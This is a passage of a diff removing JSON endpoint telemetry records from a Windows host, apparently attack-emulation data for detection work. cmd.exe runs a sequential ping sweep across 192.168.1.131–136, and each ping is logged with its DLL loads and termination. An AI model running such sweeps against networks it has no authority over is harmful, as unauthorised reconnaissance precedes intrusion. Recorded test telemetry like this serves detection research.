- }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - 
"pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "process", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572621990000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.131", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - 
"image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5520, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572626830000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.132", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572626970000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 
"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572631990000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.133", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8060, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "process", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572636830000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.134", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "process", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572641990000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.135", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "process", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572646830000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.136", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5316, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572646980000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "event_type": "registry", 
- "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program 